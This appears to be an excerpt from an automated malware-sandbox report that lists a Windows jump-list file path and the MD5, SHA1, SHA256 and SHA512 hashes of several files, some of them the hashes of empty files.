SHA5124b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bd009f8192e4bf5c50d7ff2882d1bbe5
SHA14735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA2562cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA5124b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5bd009f8192e4bf5c50d7ff2882d1bbe5
SHA14735a9e2f4a6188ed8d57639b0e0841a36150b83
SHA2562cdd22d384c6c7d7a2ef71db040d83597dd7ea59a7d125e69bae11295300b124
SHA5124b554b9d026b9d00e879004148f8028ee3b7420c6d05ac249b560649f9961feca01e835e86ad2871f9dc477b5ae5d7d38bd4f32c1e967406a0de2aefbdb62045
-
MD5
dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
68a3697e32d417f2e9290858efcaa7c7
SHA140ab8410e13c5905fc5bff937c97b77d6f301ca1
SHA2566fcf0da1bf1c50496186b7ce9e50166af41b3cfb020e58b29fed1852c09bf171
SHA5126578a96e9a07e7224a23ef81db374982d9c19517db8f3af743941e58b5aa9d0acaac81cf7ed4140e701373fbc5189ee2907b870ddecea50e598c2f9d74fe8ead
-
MD5
42603dc250c3469d8ff863b9671b6313
SHA191c7bce655a0491e0d50b6dab7dde14b221a01d3
SHA256762182f7e8a444b1dcacbc73fd042f9d75d66f3d05dd03ef192ebaa8a6cb5047
SHA512b41143d10349932df879c5acb612b9036b2eae6e3e788e86a651c0dd870492d1f51ca041b56d0860aa396b895005859e776637a113e636d1ac5a989056f75cce
-
MD5
0750828e5a80dae0280c43945332e145
SHA1fa1c85c33c0b99f8df14b6ccbd37f5df3d62c30c
SHA256637dd8f4245397e281bf84433f75eeb40461e70e81a11a4c2c252dc8f9e4b947
SHA512a45f4023f5d8951fef44bbe830c1b8992e7cb9c013882048d7227bac0c76869584c1ccc1d323803ced7a1e353998d0bface12eb9ef1dcd04e8e39b155528fd14
-
MD5
0941efccfdbde6a619081456be071102
SHA14d9079f335bfdb4e88e022ffdd2193c4561f099d
SHA25699dbace98f5f29a5c0c962db270dc195a8b6d2f8dbb009b79b929ff9d68d8281
SHA512bbb587471dec6beae7852ae2ee1fff0efb26ce57ab69dbaf4385c965bf09a31be60c67951e52f488866daa0effab715e6b1a0aca5b02a7fdcc5dd586d84d56ab